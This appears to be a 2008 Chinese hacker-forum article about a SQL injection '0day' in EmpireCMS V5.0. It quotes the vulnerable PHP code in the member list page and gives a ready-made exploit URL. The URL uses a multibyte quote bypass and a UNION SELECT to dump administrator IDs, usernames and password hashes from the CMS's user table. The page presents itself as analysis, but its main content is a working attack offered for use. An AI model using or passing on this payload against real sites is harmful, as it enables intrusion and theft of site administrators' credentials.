返回西北黑客基地首页
【免费资源】 | 免费空间 | 免费域名 | 免费硬盘 | 免费帐号 | 免费代理 | 免费博客 | 免费赚钱 | 免费电影 | 免费小说 | 搞笑短信 | 个性签名 | 网页颜色 | MD5查询
您现在的位置: 西北安全基地 >> 黑客学院 >> 脚本黑客 >> 黑客学院正文
帝国ECMS 0Day V5.0注射漏洞分析
作者:小彬    黑客学院来源:Kker Bbs    点击数:    更新时间:2008-8-17 
   

 

帝国ECMS /e/member/list/index.php文件:

if($sear)
{
 $keyboard=RepPostVar2($_GET['keyboard']);
 if($keyboard)
 {
  $add.=$where.$user_username." like '%$keyboard%'";
 }
 $search.="&sear=1&keyboard=$keyboard";
}

判断sear参数是否存在,然后直接去keyboard的参数,然后再判断keyboard值是否为空,如果不为空就直接把keyboard带入查询产生注射漏洞.

利用方法:

/e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9'+union+select+1,1,1,concat(char(123),userid,char(95),username,char(95),password,char(125))+from+phome_enewsuser/*

附上软件截图:

 


  • 上一个黑客学院:

  • 下一个黑客学院: 没有了
  •    

    赞助广告
     

    最新更新文章
     
    热门推荐文章
  • 此栏目下没有热点推荐黑客学院
  •  
     

    关于我们 联系我们 招聘信息 加入会员 诚征代理 广告服务 欢迎投稿 友情链接 网站地图
    7X24咨询电话:13279515908 投诉电话:+86-029-38118822
    客服QQ:36362 售后QQ:244163 技术QQ:250366708
    Copyright ©2008版权没有-任意抄袭-确保完整
    工商营业执照号码:622701198410144516
    陇ICP备06000402号 
    [设为首页]·[加入收藏]